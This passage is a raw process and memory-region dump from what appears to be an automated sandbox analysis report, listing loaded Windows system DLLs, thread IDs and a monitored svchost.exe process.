"" Region: id = 2161 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2162 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2163 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2164 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 2165 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 2166 start_va = 0x7fefcb40000 end_va = 0x7fefcb48fff monitored = 0 entry_point = 0x7fefcb427bc region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2167 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2168 start_va = 0x7fefcb30000 end_va = 0x7fefcb38fff monitored = 0 entry_point = 0x7fefcb327bc region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2169 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2170 start_va = 0x7fefcb40000 end_va = 0x7fefcb48fff monitored = 0 entry_point = 0x7fefcb427bc region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2171 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2172 start_va = 0x7fefcb30000 end_va = 0x7fefcb38fff monitored = 0 entry_point = 0x7fefcb327bc region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2173 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2217 start_va = 0x7fefca90000 end_va = 0x7fefcb4afff monitored = 0 entry_point = 0x7fefca96de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2220 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2801 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2802 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2803 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2804 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2805 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 3730 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3731 start_va = 0x1090000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 3738 start_va = 0x1090000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 3739 start_va = 0x1250000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 4354 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 4355 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4415 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4416 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 4417 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4418 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4642 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 4643 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4696 start_va = 0x1440000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 4697 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Thread: id = 278 os_tid = 0x270 Thread: id = 282 os_tid = 0x280 Thread: id = 283 os_tid = 0x284 Thread: id = 284 os_tid = 0x288 Thread: id = 285 os_tid = 0x28c Thread: id = 286 os_tid = 0x290 Thread: id = 287 os_tid = 0x294 Thread: id = 288 os_tid = 0x298 Thread: id = 472 os_tid = 0x590 Thread: id = 492 os_tid = 0x5f4 Thread: id = 493 os_tid = 0x5f8 Thread: id = 495 os_tid = 0x600 Thread: id = 524 os_tid = 0x678 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x29d7e000" os_pid = "0x2a0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ca7a" [0xc000000f], "LOCAL" [0x7] Region: id = 2174 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2175 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2176 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2177 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2178 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2179 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2180 start_va = 0xffce0000 end_va = 0xffceafff monitored = 0 entry_point = 0xffce246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2181 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2182 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2183 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2184 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2185 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2186 start_va = 0xf0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2187 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2188 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2189 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2190 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2191 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2192 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2193 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2194 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2195 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2196 start_va = 0x290000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2197 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2198 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2199 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2200 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2201 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2202 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2203 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2204 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2205 start_va = 0x450000 end_va = 0x5d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2206 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2207 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2208 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2209 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 2210 start_va = 0x770000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 2211 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2212 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2213 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2214 start_va = 0x390000 end_va = 0x40cfff monitored = 0 entry_point = 0x39cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2215 start_va = 0x390000 end_va = 0x40cfff monitored = 0 entry_point = 0x39cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2216 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2218 start_va = 0x830000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 2219 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2221 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2222 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2223 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2285 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2286 start_va = 0xae0000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 2287 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2288 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2289 start_va = 0xb60000 end_va = 0xe2efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2293 start_va = 0x7fefc5f0000 end_va = 0x7fefc785fff monitored = 0 entry_point = 0x7fefc5f78e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2294 start_va = 0x390000 end_va = 0x3b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2296 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2297 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2305 start_va = 0xf40000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 2306 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2307 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2308 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2309 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2310 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2311 start_va = 0x950000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 2312 start_va = 0x7fefd4a0000 end_va = 0x7fefd50cfff monitored = 0 entry_point = 0x7fefd4a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2313 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2314 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2315 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2316 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2317 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2318 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2319 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2320 start_va = 0x7fefc390000 end_va = 0x7fefc3bbfff monitored = 0 entry_point = 0x7fefc3915c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2321 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2322 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2323 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2324 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2325 start_va = 0xe0000 end_va = 0xecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2326 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2327 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2328 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2329 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2376 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2377 start_va = 0x7fefc340000 end_va = 0x7fefc36bfff monitored = 0 entry_point = 0x7fefc3415c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2378 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2379 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2380 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2381 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2382 start_va = 0xe0000 end_va = 0xecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2452 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2456 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2457 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2470 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2471 start_va = 0x11a0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 2472 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2473 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2474 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2475 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2476 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2492 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2687 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 2688 start_va = 0x12e0000 end_va = 0x135ffff 